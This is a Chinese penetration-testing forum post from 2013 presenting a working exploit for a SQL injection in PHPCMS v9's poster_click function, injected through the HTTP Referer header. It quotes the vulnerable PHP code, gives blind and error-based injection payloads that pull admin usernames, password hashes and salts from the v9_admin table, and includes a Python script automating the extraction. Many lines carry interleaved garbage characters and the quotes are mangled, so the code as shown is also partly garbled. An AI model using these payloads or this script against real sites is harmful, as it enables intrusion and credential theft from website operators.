中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]

---

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:

5 l5 M& m2 D0 p, |; w, \1 f问题函数\phpcms\modules\poster\index.php
! Q/ F  c3 t3 p
2 F! Z3 b% M6 R* q+ p/ o# ypublic function poster_click() {
8 p: i, w0 e' h( P+ J! T$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$r = $this->db->get_one(array('id'=>$id));
3 x, Y1 G+ h  H& d" vif (!is_array($r) && empty($r)) return false;
$ip_area = pc_base::load_sys_class('ip_area');
/ |$ g( ]. T+ J1 q  p$ip = ip();
$area = $ip_area->get($ip);
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
, G: K7 F  x* F7 C9 G/ [' Kif($id) {
7 Q1 l: h0 k8 h; P' F$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$setting = string2array($r['setting']);
if (count($setting)==1) {
$ L9 U/ k6 G  s9 l$url = $setting['1']['linkurl'];
7 z$ ?3 n# E  ]' A; [} else {
2 F. m- l% s/ l0 @) f$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
}
header('Location: '.$url);
: M2 l( ]) U0 L3 l4 Y}
- r. o1 O7 c# D" J) ~
; {" N% W/ N: z

利用方式：

3 ]3 m4 @# u$ I7 _0 ~) ~: R1、可以采用盲注入的手法：
3 u& [- Z( A/ q( ~
/ T3 U3 Z9 C7 j5 [) r( Preferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

, A# U! r& D% s通过返回页面，正常与否一个个猜解密码字段。
7 v+ b- s2 Q6 Z  X9 l" |/ Q
* k. w$ K) H! |/ M2、代码是花开写的，随手附上了：
& ^3 n% Z9 Z/ ^' y. p$ t
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

2 k7 O+ d- Y$ Y5 ]; B7 T; w此方法是爆错注入手法，原理自查。



利用程序:

% d5 a) C7 y4 c#!/usr/bin/env python
import httplib,sys,re
9 v3 ?7 z' }+ r( T" T! V; Z
def attack():
7 H* @; U* S9 l- v" N1 kprint “Code by Pax.Mac Team conqu3r!”
print “Welcome to our zone!!!”
url=sys.argv[1]
paths=sys.argv[2]
. S3 Z6 t8 f( n" b9 l3 [8 F( Econn = httplib.HTTPConnection(url)
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
) t. O- q" }" v3 H+ G  H( i“Accept”: “text/plain”,
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
' E: B" i" W# nconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
r1 = conn.getresponse()
" L& {/ R* y2 t4 v* r: vdatas=r1.read()
5 s' t; W# u4 v3 O4 _" I5 Vdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
4 O0 y* _( I* E0 ^  U; ~  Q5 pprint datas[0]
6 B$ v. p% j/ N0 I& Rconn.close()
if __name__==”__main__”:
if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
# h. ^. F; C: {& }3 [* ~8 Nprint “Usgae:”
7 r5 z+ c6 t1 E# s8 S! k& [  Cprint “    phpcmsattack.py   www.paxmac.org /”
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
- j% N  X7 ~+ Q$ J. ?3 t$ Tsys.exit(1)
7 Z, ^% ^! S' W3 d- S  j3 t4 y* Hattack()

: n. G/ c' n* g: n

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2